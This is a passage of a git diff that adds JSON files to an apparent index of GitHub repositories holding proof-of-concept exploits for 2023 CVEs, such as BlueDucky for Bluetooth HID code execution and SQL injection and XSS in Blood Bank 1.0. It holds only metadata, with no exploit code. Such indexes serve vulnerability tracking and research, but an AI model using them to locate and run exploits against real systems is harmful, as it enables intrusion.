"intercept6\/CVE-2023-45857-Demo", + "owner": { + "login": "intercept6", + "id": 4459220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4459220?v=4", + "html_url": "https:\/\/github.com\/intercept6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/intercept6\/CVE-2023-45857-Demo", + "description": "CVE-2023-45857の挙動を確認するデモ", + "fork": false, + "created_at": "2023-10-26T04:18:03Z", + "updated_at": "2024-09-14T07:43:38Z", + "pushed_at": "2023-10-26T04:18:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 723193114, + "name": "CVE-2023-45857-Demo", + "full_name": "fuyuooumi1027\/CVE-2023-45857-Demo", + "owner": { + "login": "fuyuooumi1027", + "id": 151829119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151829119?v=4", + "html_url": "https:\/\/github.com\/fuyuooumi1027", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fuyuooumi1027\/CVE-2023-45857-Demo", + "description": null, + "fork": false, + "created_at": "2023-11-24T22:42:56Z", + "updated_at": "2023-12-04T06:56:24Z", + "pushed_at": "2023-11-24T22:43:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45866.json b/2023/CVE-2023-45866.json new file mode 100644 index 0000000000..c65f9281e8 --- /dev/null +++ b/2023/CVE-2023-45866.json @@ -0,0 +1,188 @@ +[ + { + "id": 743868830, + "name": "BlueDucky", + "full_name": "pentestfunctions\/BlueDucky", + "owner": { + "login": "pentestfunctions", + "id": 144001335, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144001335?v=4", + "html_url": "https:\/\/github.com\/pentestfunctions", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pentestfunctions\/BlueDucky", + "description": "🚨 CVE-2023-45866 - BlueDucky Implementation (Using DuckyScript) 🔓 Unauthenticated Peering Leading to Code Execution (Using HID Keyboard)", + "fork": false, + "created_at": "2024-01-16T06:52:02Z", + "updated_at": "2024-11-28T02:37:46Z", + "pushed_at": "2024-08-18T08:26:46Z", + "stargazers_count": 1278, + "watchers_count": 1278, + "has_discussions": false, + "forks_count": 217, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 217, + "watchers": 1278, + "score": 0, + "subscribers_count": 20 + }, + { + "id": 743886715, + "name": "BluetoothDucky", + "full_name": "Eason-zz\/BluetoothDucky", + "owner": { + "login": "Eason-zz", + "id": 53202099, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53202099?v=4", + "html_url": "https:\/\/github.com\/Eason-zz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Eason-zz\/BluetoothDucky", + "description": "CVE-2023-45866 - BluetoothDucky implementation (Using DuckyScript)", + "fork": false, + "created_at": "2024-01-16T07:44:35Z", + "updated_at": "2024-10-03T14:16:35Z", + "pushed_at": "2024-01-15T15:16:40Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 747408718, + "name": "cve-2023-45866-py", + "full_name": "jjjjjjjj987\/cve-2023-45866-py", + "owner": { + "login": "jjjjjjjj987", + "id": 106833546, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106833546?v=4", + "html_url": "https:\/\/github.com\/jjjjjjjj987", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jjjjjjjj987\/cve-2023-45866-py", + "description": null, + "fork": false, + "created_at": "2024-01-23T21:39:41Z", + "updated_at": "2024-01-23T21:40:35Z", + "pushed_at": "2024-01-23T21:42:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821901654, + "name": "Bluepop", + "full_name": "cisnarfu\/Bluepop", + "owner": { + "login": "cisnarfu", + "id": 169081131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169081131?v=4", + "html_url": "https:\/\/github.com\/cisnarfu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cisnarfu\/Bluepop", + "description": "CVE-2023-45866", + "fork": false, + "created_at": "2024-06-29T19:06:37Z", + "updated_at": "2024-06-29T19:09:57Z", + "pushed_at": "2024-06-29T19:09:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 851042332, + "name": "CVE-2023-45866_EXPLOITS", + "full_name": "AvishekDhakal\/CVE-2023-45866_EXPLOITS", + "owner": { + "login": "AvishekDhakal", + "id": 97275279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97275279?v=4", + "html_url": "https:\/\/github.com\/AvishekDhakal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AvishekDhakal\/CVE-2023-45866_EXPLOITS", + "description": "Exploits Tested in Mi A2 Lite and Realme 2 pro", + "fork": false, + "created_at": "2024-09-02T10:13:27Z", + "updated_at": "2024-09-02T10:15:53Z", + "pushed_at": "2024-09-02T10:15:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869860995, + "name": "CVE-2023-45866-POC", + "full_name": "Chedrian07\/CVE-2023-45866-POC", + "owner": { + "login": "Chedrian07", + "id": 108463785, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108463785?v=4", + "html_url": "https:\/\/github.com\/Chedrian07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chedrian07\/CVE-2023-45866-POC", + "description": null, + "fork": false, + "created_at": "2024-10-09T02:48:58Z", + "updated_at": "2024-10-11T05:34:28Z", + "pushed_at": "2024-10-11T05:34:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4590.json b/2023/CVE-2023-4590.json new file mode 100644 index 0000000000..dafd7df268 --- /dev/null +++ b/2023/CVE-2023-4590.json @@ -0,0 +1,33 @@ +[ + { + "id": 844686004, + "name": "CVE-2023-4590", + "full_name": "dgndrn\/CVE-2023-4590", + "owner": { + "login": "dgndrn", + "id": 111239114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111239114?v=4", + "html_url": "https:\/\/github.com\/dgndrn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dgndrn\/CVE-2023-4590", + "description": null, + "fork": false, + "created_at": "2024-08-19T19:08:18Z", + "updated_at": "2024-08-22T17:24:57Z", + "pushed_at": "2024-08-19T19:27:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4596.json b/2023/CVE-2023-4596.json new file mode 100644 index 0000000000..02d0f9ef8b --- /dev/null +++ b/2023/CVE-2023-4596.json @@ -0,0 +1,100 @@ +[ + { + "id": 685284508, + "name": "CVE-2023-4596", + "full_name": "E1A\/CVE-2023-4596", + "owner": { + "login": "E1A", + "id": 57531297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57531297?v=4", + "html_url": "https:\/\/github.com\/E1A", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/E1A\/CVE-2023-4596", + "description": "PoC Script for CVE-2023-4596, unauthenticated Remote Command Execution through arbitrary file uploads.", + "fork": false, + "created_at": "2023-08-30T22:40:10Z", + "updated_at": "2024-10-24T17:09:32Z", + "pushed_at": "2024-02-08T20:41:01Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-4596", + "exploits", + "poc" + ], + "visibility": "public", + "forks": 5, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802322129, + "name": "CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version", + "full_name": "X-Projetion\/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version", + "description": "CVE-2023-4596 Vulnerable Exploit and Checker Version", + "fork": false, + "created_at": "2024-05-18T01:39:12Z", + "updated_at": "2024-05-20T02:54:08Z", + "pushed_at": "2024-05-20T02:54:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 838725789, + "name": "CVE-2023-4596-OpenSSH-Multi-Checker", + "full_name": "X-Projetion\/CVE-2023-4596-OpenSSH-Multi-Checker", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2023-4596-OpenSSH-Multi-Checker", + "description": "CVE-2024-6387-checker is a tool or script designed to detect the security vulnerability known as CVE-2024-6387 OpenSSH. CVE-2024-6387 OpenSSH is an entry in the Common Vulnerabilities and Exposures (CVE) that documents security weaknesses discovered in certain software or systems.", + "fork": false, + "created_at": "2024-08-06T08:12:48Z", + "updated_at": "2024-08-10T11:17:27Z", + "pushed_at": "2024-08-06T08:27:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45966.json b/2023/CVE-2023-45966.json new file mode 100644 index 0000000000..b5a191f8d0 --- /dev/null +++ b/2023/CVE-2023-45966.json @@ -0,0 +1,33 @@ +[ + { + "id": 706845140, + "name": "CVE-2023-45966", + "full_name": "jet-pentest\/CVE-2023-45966", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2023-45966", + "description": "Blind SSRF in umputun\/remark42 <= 1.12.1", + "fork": false, + "created_at": "2023-10-18T18:18:25Z", + "updated_at": "2023-10-18T18:18:25Z", + "pushed_at": "2023-10-18T18:29:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45992.json b/2023/CVE-2023-45992.json new file mode 100644 index 0000000000..a0db62d93e --- /dev/null +++ b/2023/CVE-2023-45992.json @@ -0,0 +1,33 @@ +[ + { + "id": 707284838, + "name": "CVE-2023-45992", + "full_name": "harry935\/CVE-2023-45992", + "owner": { + "login": "harry935", + "id": 2310647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2310647?v=4", + "html_url": "https:\/\/github.com\/harry935", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/harry935\/CVE-2023-45992", + "description": null, + "fork": false, + "created_at": "2023-10-19T15:26:59Z", + "updated_at": "2023-10-19T15:27:00Z", + "pushed_at": "2023-10-19T15:45:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46003.json b/2023/CVE-2023-46003.json new file mode 100644 index 0000000000..b2f48ee1f1 --- /dev/null +++ b/2023/CVE-2023-46003.json @@ -0,0 +1,33 @@ +[ + { + "id": 707100656, + "name": "CVE-2023-46003", + "full_name": "leekenghwa\/CVE-2023-46003", + "owner": { + "login": "leekenghwa", + "id": 45155253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45155253?v=4", + "html_url": "https:\/\/github.com\/leekenghwa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/leekenghwa\/CVE-2023-46003", + "description": null, + "fork": false, + "created_at": "2023-10-19T08:17:53Z", + "updated_at": "2023-10-19T08:17:54Z", + "pushed_at": "2023-10-20T01:07:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46012.json b/2023/CVE-2023-46012.json new file mode 100644 index 0000000000..a36dbb889c --- /dev/null +++ b/2023/CVE-2023-46012.json @@ -0,0 +1,33 @@ +[ + { + "id": 796794265, + "name": "CVE-2023-46012", + "full_name": "dest-3\/CVE-2023-46012", + "owner": { + "login": "dest-3", + "id": 62617135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62617135?v=4", + "html_url": "https:\/\/github.com\/dest-3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dest-3\/CVE-2023-46012", + "description": "LINKSYS AC1900 EA7500v3 IGD UPnP Stack Buffer Overflow Remote Code Execution Vulnerability", + "fork": false, + "created_at": "2024-05-06T16:35:19Z", + "updated_at": "2024-05-18T05:48:14Z", + "pushed_at": "2024-05-18T05:48:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46014.json b/2023/CVE-2023-46014.json new file mode 100644 index 0000000000..c7bb2fe9b9 --- /dev/null +++ b/2023/CVE-2023-46014.json @@ -0,0 +1,33 @@ +[ + { + "id": 717160403, + "name": "CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-10T17:40:37Z", + "updated_at": "2023-11-10T17:40:37Z", + "pushed_at": "2023-11-14T08:32:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46015.json b/2023/CVE-2023-46015.json new file mode 100644 index 0000000000..f62dff6bb4 --- /dev/null +++ b/2023/CVE-2023-46015.json @@ -0,0 +1,33 @@ +[ + { + "id": 717199456, + "name": "CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-10T19:40:49Z", + "updated_at": "2023-11-10T20:15:16Z", + "pushed_at": "2023-11-14T08:53:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46016.json b/2023/CVE-2023-46016.json new file mode 100644 index 0000000000..f581986db5 --- /dev/null +++ b/2023/CVE-2023-46016.json @@ -0,0 +1,33 @@ +[ + { + "id": 717212106, + "name": "CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-10T20:24:40Z", + "updated_at": "2023-11-10T20:24:41Z", + "pushed_at": "2023-11-14T08:57:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46017.json b/2023/CVE-2023-46017.json new file mode 100644 index 0000000000..2f0aa1696d --- /dev/null +++ b/2023/CVE-2023-46017.json @@ -0,0 +1,33 @@ +[ + { + "id": 717217919, + "name": "CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-10T20:46:29Z", + "updated_at": "2023-11-10T20:46:30Z", + "pushed_at": "2023-11-14T09:00:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46018.json b/2023/CVE-2023-46018.json new file mode 100644 index 0000000000..0d5a80bc86 --- /dev/null +++ b/2023/CVE-2023-46018.json @@ -0,0 +1,33 @@ +[ + { + "id": 717349464, + "name": "CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-11T07:37:57Z", + "updated_at": "2023-11-11T07:37:57Z", + "pushed_at": "2023-11-14T09:02:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46019.json b/2023/CVE-2023-46019.json new file mode 100644 index 0000000000..193b029057 --- /dev/null +++ b/2023/CVE-2023-46019.json @@ -0,0 +1,33 @@ +[ + { + "id": 717359044, + "name": "CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-11T08:23:30Z", + "updated_at": "2023-11-11T08:23:31Z", + "pushed_at": "2023-11-14T09:04:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46020.json b/2023/CVE-2023-46020.json new file mode 100644 index 0000000000..e1e89724b8 --- /dev/null +++ b/2023/CVE-2023-46020.json @@ -0,0 +1,33 @@ +[ + { + "id": 717361875, + "name": "CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-11T08:37:57Z", + "updated_at": "2023-11-11T08:37:58Z", + "pushed_at": "2023-11-14T09:05:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46021.json b/2023/CVE-2023-46021.json new file mode 100644 index 0000000000..d53d4be4f0 --- /dev/null +++ b/2023/CVE-2023-46021.json @@ -0,0 +1,33 @@ +[ + { + "id": 717369802, + "name": "CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-11T09:14:56Z", + "updated_at": "2023-11-11T10:55:41Z", + "pushed_at": "2023-11-14T09:55:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46022.json b/2023/CVE-2023-46022.json new file mode 100644 index 0000000000..c81cf1d4e7 --- /dev/null +++ b/2023/CVE-2023-46022.json @@ -0,0 +1,33 @@ +[ + { + "id": 717392042, + "name": "CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-11T10:54:25Z", + "updated_at": "2024-10-13T19:20:00Z", + "pushed_at": "2024-10-13T19:19:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46197.json b/2023/CVE-2023-46197.json new file mode 100644 index 0000000000..c4f14fcae7 --- /dev/null +++ b/2023/CVE-2023-46197.json @@ -0,0 +1,33 @@ +[ + { + "id": 708807176, + "name": "CVE-2023-46197", + "full_name": "RandomRobbieBF\/CVE-2023-46197", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-46197", + "description": "Popup by Supsystic <= 1.10.19 - Missing Authorization to Sensitive Information Exposure", + "fork": false, + "created_at": "2023-10-23T12:38:37Z", + "updated_at": "2023-10-23T12:38:37Z", + "pushed_at": "2023-10-23T12:44:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4622.json b/2023/CVE-2023-4622.json new file mode 100644 index 0000000000..98f5a5d2ea --- /dev/null +++ b/2023/CVE-2023-4622.json @@ -0,0 +1,33 @@ +[ + { + "id": 820662539, + "name": "CVE-CVE-2023-4622", + "full_name": "0range1337\/CVE-CVE-2023-4622", + "owner": { + "login": "0range1337", + "id": 146405672, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146405672?v=4", + "html_url": "https:\/\/github.com\/0range1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0range1337\/CVE-CVE-2023-4622", + "description": null, + "fork": false, + "created_at": "2024-06-26T23:42:38Z", + "updated_at": "2024-06-26T23:48:15Z", + "pushed_at": "2024-06-26T23:48:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46303.json b/2023/CVE-2023-46303.json new file mode 100644 index 0000000000..1fa527d098 --- /dev/null +++ b/2023/CVE-2023-46303.json @@ -0,0 +1,33 @@ +[ + { + "id": 646374478, + "name": "ssrf-via-img", + "full_name": "0x1717\/ssrf-via-img", + "owner": { + "login": "0x1717", + "id": 124237568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124237568?v=4", + "html_url": "https:\/\/github.com\/0x1717", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x1717\/ssrf-via-img", + "description": "CVE-2023-46303 - SSRF Vulnerability in PANDOC and CALIBRE", + "fork": false, + 